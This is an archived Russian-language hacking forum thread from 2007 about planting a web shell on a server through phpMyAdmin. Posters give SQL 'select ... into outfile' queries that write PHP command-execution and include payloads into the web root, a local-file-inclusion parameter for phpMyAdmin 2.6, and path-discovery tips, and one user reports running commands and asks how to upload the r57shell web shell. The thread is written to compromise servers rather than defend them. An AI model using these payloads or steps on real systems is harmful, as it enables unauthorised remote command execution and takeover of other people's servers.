Просмотр полной версии : Залить ШЕЛЛ через PHPmyadmin
street16
13.01.2007, 00:00
Собственно сабж
если есть права на запись, выполняй запрос
select '<? include($_GET[sh]); ?>' from table into outfile '/home/user/...';
2ettee
а какая разница между моим и твоим постом?
street16
13.01.2007, 01:43
а как узнать /home/site/www/dir/shell.php что именно вместо этого подставлять?
кароче если версия 2.6.* и есть права на запись хоть в тмп, то можно
phpmyadmin/libraries/database_interface.lib.php?cfg[Server][extension]=LOCAL_FILE
street16
13.01.2007, 02:05
phpmyadmin/libraries/database_interface.lib.php нет там такого
версия phpMyAdmin 2.5.7
а как узнать /home/site/www/dir/shell.php что именно вместо этого подставлять?
в phpmyadmin довольно много способов узнать локальный путь например попросить какойнить файл который обычно не вызывается на прямую а только инклудится, а потом попробовать select '<? phpinfo(); ?>' into outfile '/path_to_phpmyadmin/shell.php' либо вобще поищи на http://packetstormsecurity.org про phpmyadmin инфу
street16
13.01.2007, 03:01
ок у меня получилось select '<?php system($cmd) ?>' into outfile '/path_to_phpmyadmin/shell.php'
ротом я набрал www.host/phpmyadmin/shell.php?cmd=dir,но там все в нечетабельном виде,как мне напрмер залить r57shell? На сервере стоит винда
пишет #1045 - Access denied for user 'name'@'localhost' (using password: YES)
Значит нет прав на заливку.
сделал вышеописанный запрос вот что мне выдало
Can't create/write to file 'd:\htdocs\phpmyadmin\shell.php (errcode 22)
http://dev.mysql.com/doc/refman/5.0/en/cannot-create.html
Error code: 22 ozna4aet invalid argument
как быть дальше?
vBulletin® v3.8.14, Copyright ©2000-2026, vBulletin Solutions, Inc. Перевод: zCarot